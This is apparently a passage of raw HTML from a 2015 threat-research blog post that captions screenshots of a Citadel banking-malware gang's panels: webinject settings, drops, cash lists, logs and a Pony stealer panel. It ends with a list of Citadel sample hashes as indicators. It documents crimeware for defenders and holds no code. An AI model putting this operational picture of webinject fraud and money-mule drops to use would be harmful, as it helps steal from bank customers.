&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-3NhZqk5y3e-Q8YyQRkwQNEnkCijf1Acm2qMqrpHPPUZQse4Y6Tr4-BHdgRdBoNbQwr2TBq_-86e4D-Ax5mTDBH8_p_sX-9CwUj4fPSYAXo_L8RvKxpGQqNtm40ntsP8_8E5bwkvWoy4/s1600/2015-11-02_18-13-29.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;168&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-3NhZqk5y3e-Q8YyQRkwQNEnkCijf1Acm2qMqrpHPPUZQse4Y6Tr4-BHdgRdBoNbQwr2TBq_-86e4D-Ax5mTDBH8_p_sX-9CwUj4fPSYAXo_L8RvKxpGQqNtm40ntsP8_8E5bwkvWoy4/s400/2015-11-02_18-13-29.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieB0usCnwX2W1-y5Zu5nb3kAMM7FSz96WiIknM_cMa1xJYwtvt6xdgj06M7CKkWyQxzW3oPfDMWZP5QdyCjiqizG1iYkfSEoPJVXx6cSQR2hzGSc3lY6imPuMV_ht6BZrfeHoIr8cOOBM/s1600/2015-11-02_18-14-02.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;145&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieB0usCnwX2W1-y5Zu5nb3kAMM7FSz96WiIknM_cMa1xJYwtvt6xdgj06M7CKkWyQxzW3oPfDMWZP5QdyCjiqizG1iYkfSEoPJVXx6cSQR2hzGSc3lY6imPuMV_ht6BZrfeHoIr8cOOBM/s400/2015-11-02_18-14-02.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Replacer settings:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfbOtuaA-Uiku9L3P-Ve75v0qLObTDka2eHknirEFoJ8nIZpZgf2TfoL6xcKXMthWd4CBVy_ZMghtu43I8z3FdsPTcu3TcehAUjeh6RtZOpVtNmu_eDT5lkVqFiAP46IgnbrjtWOW_mO4/s1600/2015-11-02_18-14-55.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;360&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfbOtuaA-Uiku9L3P-Ve75v0qLObTDka2eHknirEFoJ8nIZpZgf2TfoL6xcKXMthWd4CBVy_ZMghtu43I8z3FdsPTcu3TcehAUjeh6RtZOpVtNmu_eDT5lkVqFiAP46IgnbrjtWOW_mO4/s400/2015-11-02_18-14-55.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Chat:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmlLjL_AIXk-U9MfGXZUAAB-bZe5evs2gMlyzeB-9A829FL7tGi4pSukZTDVh9Uj5DXVbf5oeNf-LDRUu1Cl3HU8XX_ycSDQNxBZW-1i7LBPcBOKocesUgcq8ea_Yj6eo8Jc_l_fTpsg4/s1600/2015-11-29_13-02-54.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;363&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmlLjL_AIXk-U9MfGXZUAAB-bZe5evs2gMlyzeB-9A829FL7tGi4pSukZTDVh9Uj5DXVbf5oeNf-LDRUu1Cl3HU8XX_ycSDQNxBZW-1i7LBPcBOKocesUgcq8ea_Yj6eo8Jc_l_fTpsg4/s400/2015-11-29_13-02-54.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Drop:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFD9-PS4fzdw614mDkdzKrN0IsL08aqeN2CiohciWYqIF3uNHWpAtisBnisXxLoR1SPUJ04q22vmUfwMRieVH2DGtThzix6covdtfvKYpnxLVuLLu_GnLB-0p6lTyBndr_yQlxvoQFo0A/s1600/2015-11-29_13-04-29.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;240&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFD9-PS4fzdw614mDkdzKrN0IsL08aqeN2CiohciWYqIF3uNHWpAtisBnisXxLoR1SPUJ04q22vmUfwMRieVH2DGtThzix6covdtfvKYpnxLVuLLu_GnLB-0p6lTyBndr_yQlxvoQFo0A/s400/2015-11-29_13-04-29.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Fakes:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgT7X7GWAhUoRkXlOcl9ILlW62zbbCB9SyeZ09kkViLE_gqNrr1Umn9La-PwHurWHGvB0RIszijWwr-qmj3NnjVY_VHRyztJOIswqkqbFw8jrOLJNLBhuxVx0_0NzgXZaV6jl6kECIvEN0/s1600/2015-11-29_13-06-11.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;200&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgT7X7GWAhUoRkXlOcl9ILlW62zbbCB9SyeZ09kkViLE_gqNrr1Umn9La-PwHurWHGvB0RIszijWwr-qmj3NnjVY_VHRyztJOIswqkqbFw8jrOLJNLBhuxVx0_0NzgXZaV6jl6kECIvEN0/s400/2015-11-29_13-06-11.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
WebInject server 2:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsZKFRLkYG-Z0jM1Bcr724NyYHCdru7CHzuc0AWXG4egViXgPIvGrf-JcRvLgdpHQzV1f1eXjoAUTwo_Dyt51YN68FRMfca6e31DMSCpU7wVvpBE8CkCVk-UkrvVB8ZmBHs6zXXKJL-g8/s1600/2015-11-17_13-41-01.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;292&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsZKFRLkYG-Z0jM1Bcr724NyYHCdru7CHzuc0AWXG4egViXgPIvGrf-JcRvLgdpHQzV1f1eXjoAUTwo_Dyt51YN68FRMfca6e31DMSCpU7wVvpBE8CkCVk-UkrvVB8ZmBHs6zXXKJL-g8/s400/2015-11-17_13-41-01.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Dashboard:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnM0cSOJpNKglqlno6FJ4Ooqnn3DbDFFwXcpFl6_qtJ1RrvjAqOSpqzmja2hpwt5nPp3kw6wkazlPS6b6IdEv32ka4DgUtkKoGHj9gEbKL2twibUa8m50vYQ4cu0dV6axtEydORvcQ8v8/s1600/2015-11-17_13-43-16.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;186&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnM0cSOJpNKglqlno6FJ4Ooqnn3DbDFFwXcpFl6_qtJ1RrvjAqOSpqzmja2hpwt5nPp3kw6wkazlPS6b6IdEv32ka4DgUtkKoGHj9gEbKL2twibUa8m50vYQ4cu0dV6axtEydORvcQ8v8/s400/2015-11-17_13-43-16.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Command:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdYUBs8x6qDdhxShXe1UiuXwfON4vPX1EDBW8KgwkqI_vNXDCzxIk7Y71Z0yjiY-NjdcwpzfMS0FUoo8ke9tbt1q4fCmcynB6t4jVybH0cPOkzL8tGxaeHHepGVh3g8e8viyNScm1WO48/s1600/2015-11-17_13-55-17.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;236&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdYUBs8x6qDdhxShXe1UiuXwfON4vPX1EDBW8KgwkqI_vNXDCzxIk7Y71Z0yjiY-NjdcwpzfMS0FUoo8ke9tbt1q4fCmcynB6t4jVybH0cPOkzL8tGxaeHHepGVh3g8e8viyNScm1WO48/s400/2015-11-17_13-55-17.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Logs:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2qMGEQ_F9zKxQfHd2jahLhewq60vWix92mmknPYi6iC1m3mEaKx22tm36M2KWEgcfCnyBqZynmPrvWwOvFduKOz1OggMzj3dMbWVb2WYR8nFCRZZPH5MBJQkn3AkRVQ9J-6brZHkqFTc/s1600/2015-11-17_13-57-04.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;236&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2qMGEQ_F9zKxQfHd2jahLhewq60vWix92mmknPYi6iC1m3mEaKx22tm36M2KWEgcfCnyBqZynmPrvWwOvFduKOz1OggMzj3dMbWVb2WYR8nFCRZZPH5MBJQkn3AkRVQ9J-6brZHkqFTc/s400/2015-11-17_13-57-04.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Cash list:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEho6J0UqAOENAJTDUEWfmVdk33SvL4_rxi6W6yLYkGZ-wIortbPdJUaVitf4-cZeBGWGRToikuuh9prndyGdAQyJ-1rh-Hh1iip3JiTTv5GXZH0PBMGa8I47fT93NqjK6PEzQFq49aLtaI/s1600/2015-11-17_14-00-16.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;112&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEho6J0UqAOENAJTDUEWfmVdk33SvL4_rxi6W6yLYkGZ-wIortbPdJUaVitf4-cZeBGWGRToikuuh9prndyGdAQyJ-1rh-Hh1iip3JiTTv5GXZH0PBMGa8I47fT93NqjK6PEzQFq49aLtaI/s400/2015-11-17_14-00-16.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Stats:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0giFfAa3wtN0hUeXvenCrvPy1BRIHUO9nxMMrxdy1tr519IGFjQvcuvypv33y-jQxyKhpB6KhZ2Fw447AwuqBNJnlW2OduuAOawQuL1Ycap1xldCc1Z-pLxQHKM32AgM2QUVbqXuYoAQ/s1600/2015-11-17_13-48-44.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;232&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0giFfAa3wtN0hUeXvenCrvPy1BRIHUO9nxMMrxdy1tr519IGFjQvcuvypv33y-jQxyKhpB6KhZ2Fw447AwuqBNJnlW2OduuAOawQuL1Ycap1xldCc1Z-pLxQHKM32AgM2QUVbqXuYoAQ/s400/2015-11-17_13-48-44.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Drops:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8y5KeFTznGM4_Nl2z8sJzLjBWpBOwn4HgCD9NMo12MaQ4xkpUpY6bvd3KqogWBr_BVo7A1iF0idGL8Lbds462WrX8C2-dv6najg_RxUGJvh7gfzaXy3ncBuAkAaHq52ea6t5w6W3kkSk/s1600/2015-11-17_13-44-17.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;172&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8y5KeFTznGM4_Nl2z8sJzLjBWpBOwn4HgCD9NMo12MaQ4xkpUpY6bvd3KqogWBr_BVo7A1iF0idGL8Lbds462WrX8C2-dv6najg_RxUGJvh7gfzaXy3ncBuAkAaHq52ea6t5w6W3kkSk/s400/2015-11-17_13-44-17.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
State stats:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHK7sUEEmJ6E2-9hiHf6xJIJYwgzJQCvhIceAqCPrSnWEk_iQHqB17XEFLG36oxvmTmBXk73XFrwjTi-AGYCNq6V3-p8trWukXvUGKVmmd4BnHh85ZX7YrqNyFp1oKpenXAsa0-mwmVeQ/s1600/2015-11-17_13-50-19.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;131&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHK7sUEEmJ6E2-9hiHf6xJIJYwgzJQCvhIceAqCPrSnWEk_iQHqB17XEFLG36oxvmTmBXk73XFrwjTi-AGYCNq6V3-p8trWukXvUGKVmmd4BnHh85ZX7YrqNyFp1oKpenXAsa0-mwmVeQ/s400/2015-11-17_13-50-19.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
User management:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjglBjD15_90qJXVNtkfJIvNis-zDsDVUJ0HyFEn3YsPYw0K3cRmziPM70cI16jXnlsV9oDOOwxsLiw1TYOEVYQ1QU4zcyixbgpBZTgURGIzDHJCQn34yvQ-AsH66tPtcKzsyE3eoiGOfA/s1600/2015-11-17_13-51-08.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;78&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjglBjD15_90qJXVNtkfJIvNis-zDsDVUJ0HyFEn3YsPYw0K3cRmziPM70cI16jXnlsV9oDOOwxsLiw1TYOEVYQ1QU4zcyixbgpBZTgURGIzDHJCQn34yvQ-AsH66tPtcKzsyE3eoiGOfA/s400/2015-11-17_13-51-08.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Export CSV:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTC0r-4LeZa3apvSXp7qAiJotrKpipZQj6qNMgEKzjEJtzO34wBan7BXkgmq4Zn8LMY0v_xmmRmr04ERIMMxrFtVDGuQ8656KyNqiwwtyDcZfO_3-A8NOp07x6-8uMHG8-l8DfSFtld_A/s1600/2015-11-17_13-51-48.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;171&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTC0r-4LeZa3apvSXp7qAiJotrKpipZQj6qNMgEKzjEJtzO34wBan7BXkgmq4Zn8LMY0v_xmmRmr04ERIMMxrFtVDGuQ8656KyNqiwwtyDcZfO_3-A8NOp07x6-8uMHG8-l8DfSFtld_A/s400/2015-11-17_13-51-48.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Help:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAwEdaHaw3QUhPV9Z013dxvILJno7Mu0tNPKWml3YrY3rtzWzUOlP1v1cEMvT5luiiDRalcKW4DL6BfdQOkTw5v7b0IFUMWpTIDgZ-I4T0GNnJkVB_hw9csZlo-HL2CeY1L0zfenfPzjA/s1600/2015-11-17_13-52-36.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;280&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAwEdaHaw3QUhPV9Z013dxvILJno7Mu0tNPKWml3YrY3rtzWzUOlP1v1cEMvT5luiiDRalcKW4DL6BfdQOkTw5v7b0IFUMWpTIDgZ-I4T0GNnJkVB_hw9csZlo-HL2CeY1L0zfenfPzjA/s400/2015-11-17_13-52-36.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
/s/ panel:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVWfovNpTY0Tn82DgfJ9LPFzCZFv7KgEaiVjXjMbLQGNxOjEJhg0SSemRGA51mrYzxP-QKzb4dBbGVNE7XvF8dBJMgh-BHGkeAdFZs3ePfDdaq3M0nIodqgIYhD7fwAESHphUmp5TdAKY/s1600/2015-11-17_14-01-28.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;260&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVWfovNpTY0Tn82DgfJ9LPFzCZFv7KgEaiVjXjMbLQGNxOjEJhg0SSemRGA51mrYzxP-QKzb4dBbGVNE7XvF8dBJMgh-BHGkeAdFZs3ePfDdaq3M0nIodqgIYhD7fwAESHphUmp5TdAKY/s400/2015-11-17_14-01-28.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Show infos:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIPBFjrQqtxJS6-ts13z0Shht7792JKn_BqhVmtKxp0PpekhARb88OI6l7KhtIMQZkJM2g15qocZmlLoFp-CKNudecfR81Z_v7_tSNYhyDBJc8LM-8L0AA-SObp8Ak6eX72F60L67HKuM/s1600/2015-11-17_14-06-42.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;178&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIPBFjrQqtxJS6-ts13z0Shht7792JKn_BqhVmtKxp0PpekhARb88OI6l7KhtIMQZkJM2g15qocZmlLoFp-CKNudecfR81Z_v7_tSNYhyDBJc8LM-8L0AA-SObp8Ak6eX72F60L67HKuM/s400/2015-11-17_14-06-42.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
State stats:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjk1CWRGmXr4wacpyk1fWKT5n98a9NjF031uFcAYO1u3Nf3nFENw3PKbWvpYy1BoIizJ9NidJTQy5cdiZCF0AD3DD-BVoJ-lHdakawyeUi_Ie8Kg3kW88oYqUOlx-S23hzAZy2VYkuhoeI/s1600/2015-11-17_14-08-41.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;195&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjk1CWRGmXr4wacpyk1fWKT5n98a9NjF031uFcAYO1u3Nf3nFENw3PKbWvpYy1BoIizJ9NidJTQy5cdiZCF0AD3DD-BVoJ-lHdakawyeUi_Ie8Kg3kW88oYqUOlx-S23hzAZy2VYkuhoeI/s400/2015-11-17_14-08-41.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
Help:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDfX5MmPom_p_r202xqhg9NzW-6NfprU-2diBsENnE6Tqsffpt_EUaSLqT8ouVBumGLQL53V518VQqzlLNPa_R9YvGLb-UaSZaBlzPv43iZCgp01lQONwKjU4m0rfUoHvDnaD5YAzW284/s1600/2015-11-17_14-05-07.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;265&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDfX5MmPom_p_r202xqhg9NzW-6NfprU-2diBsENnE6Tqsffpt_EUaSLqT8ouVBumGLQL53V518VQqzlLNPa_R9YvGLb-UaSZaBlzPv43iZCgp01lQONwKjU4m0rfUoHvDnaD5YAzW284/s400/2015-11-17_14-05-07.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
/s2/ panel:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqNBEU3hS3Cxof5bPFz0dZkxV5gQ8BN4PyJZUXARGPD7r3AwByG1sP-imRP_dpNnacCa3GVHYc1sjqQ3bkicK8r7Yrlph9OdanMtHG2r-BvKfXvNztQQRUdnBTdiJzCnmFs8tvNqoqVAM/s1600/2015-11-17_14-09-30.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;130&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqNBEU3hS3Cxof5bPFz0dZkxV5gQ8BN4PyJZUXARGPD7r3AwByG1sP-imRP_dpNnacCa3GVHYc1sjqQ3bkicK8r7Yrlph9OdanMtHG2r-BvKfXvNztQQRUdnBTdiJzCnmFs8tvNqoqVAM/s400/2015-11-17_14-09-30.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
/s3/ panel:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhn-cD7sIXJQxc2eG5HOxG-Fa5EFeLUwl1WSYLps9pwhw2GVyqgL4CXLUE7Y1TO3GLfv8482DBAwHSMDi3VSkkd3JTnuknN23v4W3xx8Yrvqf8xp246Lv6-cHF75WYNlSnpp3BqXPIU-pI/s1600/2015-11-17_14-10-40.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;198&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhn-cD7sIXJQxc2eG5HOxG-Fa5EFeLUwl1WSYLps9pwhw2GVyqgL4CXLUE7Y1TO3GLfv8482DBAwHSMDi3VSkkd3JTnuknN23v4W3xx8Yrvqf8xp246Lv6-cHF75WYNlSnpp3BqXPIU-pI/s400/2015-11-17_14-10-40.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Pony used by one member of the gang:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4s5ekEJW4jGRcg89T4kwrYJWZk03ldnAN5PqRwrxqTe3yoV7gG-8v0edgfj4Z09PABQvIBWBWYoEroJ-a6fwLzsO8mgNmvAhJltwMsdAi8shp2Qw6g8zdpQpnSH-JlB543QqrXXJoBPA/s1600/2015-11-05_03-27-28.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;400&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4s5ekEJW4jGRcg89T4kwrYJWZk03ldnAN5PqRwrxqTe3yoV7gG-8v0edgfj4Z09PABQvIBWBWYoEroJ-a6fwLzsO8mgNmvAhJltwMsdAi8shp2Qw6g8zdpQpnSH-JlB543QqrXXJoBPA/s400/2015-11-05_03-27-28.png&quot; width=&quot;338&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
Browser logs:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxm9CceaWIBl5uxXWt3_-n03tQzGygJ2_W_galgI18p56PcwHUAx7GDK-xr70MJ8Lza-PJnDTvUxb18j0qAv6hEBUXIirGOje2-68C-XgNGKV_goD8KvVGAI0c7HrxexbYbFKFm7mQc14/s1600/2015-11-05_03-29-44.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;280&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxm9CceaWIBl5uxXWt3_-n03tQzGygJ2_W_galgI18p56PcwHUAx7GDK-xr70MJ8Lza-PJnDTvUxb18j0qAv6hEBUXIirGOje2-68C-XgNGKV_goD8KvVGAI0c7HrxexbYbFKFm7mQc14/s400/2015-11-05_03-29-44.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Citadel 0.0.1.1 samples:&lt;br /&gt;
A7D98B79FBDD7EFEBE4945F362D8A233A84D0E8D&lt;br /&gt;
C286C31ECC7119DD332F2462C75403D36951D79F&lt;br /&gt;
D399AEDA9670073E522B17B37201A1116F7D2B94&lt;br /&gt;
BFD9251E135D63F429641804C9A52568A83831CA&lt;br /&gt;
2E28E9ACAC691A40B8FAF5A95B9C92AF0947726F&lt;br /&gt;
5CAC9972BB247502E700735067B3A37E70C90278&lt;br /&gt;
959F8A78868FFE89CD4A0FD6F92D781085584E95&lt;br /&gt;
2716D3DE18616DBAB4B159BACE2F2285DA358C84&lt;br /&gt;
450A638957147A62CA9049830C3452B703875AEE&lt;br /&gt;
7C90F27C0640188EA5CF2498BF5964FF6788E79C&lt;br /&gt;
14C0728175B26446B7F140035612E303C15502CB&lt;br /&gt;
267DA16EC9B114ED5D9F5DEE07C2BF77D4CFD5E6&lt;br /&gt;
E6DD260168D6B1B29A03DF1BA875C9065B146CF3&lt;br /&gt;
963FE9DCEDA3A4552FAA88BABD4E9954B05C83D2&lt;br /&gt;
4F6AE5803C2C3EE49D11DAB48CA848F82AE31C16&lt;br /&gt;
